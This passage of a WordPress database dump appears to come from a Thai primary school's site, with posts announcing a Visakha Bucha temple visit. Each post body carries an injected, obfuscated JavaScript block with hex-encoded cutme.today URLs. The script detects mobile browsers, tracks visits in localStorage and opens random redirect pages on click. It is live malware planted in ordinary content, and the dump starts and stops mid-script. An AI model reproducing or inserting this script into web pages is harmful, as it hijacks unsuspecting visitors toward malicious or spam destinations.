_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ เปิดภาคเรียน','','inherit','closed','closed','','423-revision-v1','','','2024-08-01 20:47:09','2024-08-01 13:47:09','',423,'http://pakhaeng.ssk.in.th/?p=425',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(426,1,'2024-08-01 20:48:19','2024-08-01 13:48:19','<!-- wp:paragraph -->\n<p><strong>วันที่ 21 พฤษภาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดย นางเสน่หา พลโสภาผู้อำนวยการโรงเรียน พร้อมด้วยคณะครู และบุคลากรทางการศึกษา นำนักเรียนเข้าวัดทำบุญ ปฏิบัติธรรม เนื่องในวันวิสาขบูชา ซึ่งเป็นกิจกรรมที่พุทธศาสนิกชนถือปฏิบัติ และได้เรียนรู้หลักธรรมทางพระพุทธศาสนา</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":427,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/19-2567-724x1024.png\" alt=\"\" class=\"wp-image-427\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \"วันวิสาขบูชา\"','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%a7%e0%b8%b1','','','2024-08-01 20:48:21','2024-08-01 13:48:21','',0,'http://pakhaeng.ssk.in.th/?p=426',0,'post','',0),
(427,1,'2024-08-01 20:48:05','2024-08-01 13:48:05','','19-2567','','inherit','','closed','','19-2567','','','2024-08-01 20:48:05','2024-08-01 13:48:05','',426,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/19-2567.png',0,'attachment','image/png',0),
(428,1,'2024-08-01 20:48:19','2024-08-01 13:48:19','<!-- wp:paragraph -->\n<p><strong>วันที่ 21 พฤษภาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดย นางเสน่หา พลโสภาผู้อำนวยการโรงเรียน พร้อมด้วยคณะครู และบุคลากรทางการศึกษา นำนักเรียนเข้าวัดทำบุญ ปฏิบัติธรรม เนื่องในวันวิสาขบูชา ซึ่งเป็นกิจกรรมที่พุทธศาสนิกชนถือปฏิบัติ และได้เรียนรู้หลักธรรมทางพระพุทธศาสนา</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":427,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/19-2567-724x1024.png\" alt=\"\" class=\"wp-image-427\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 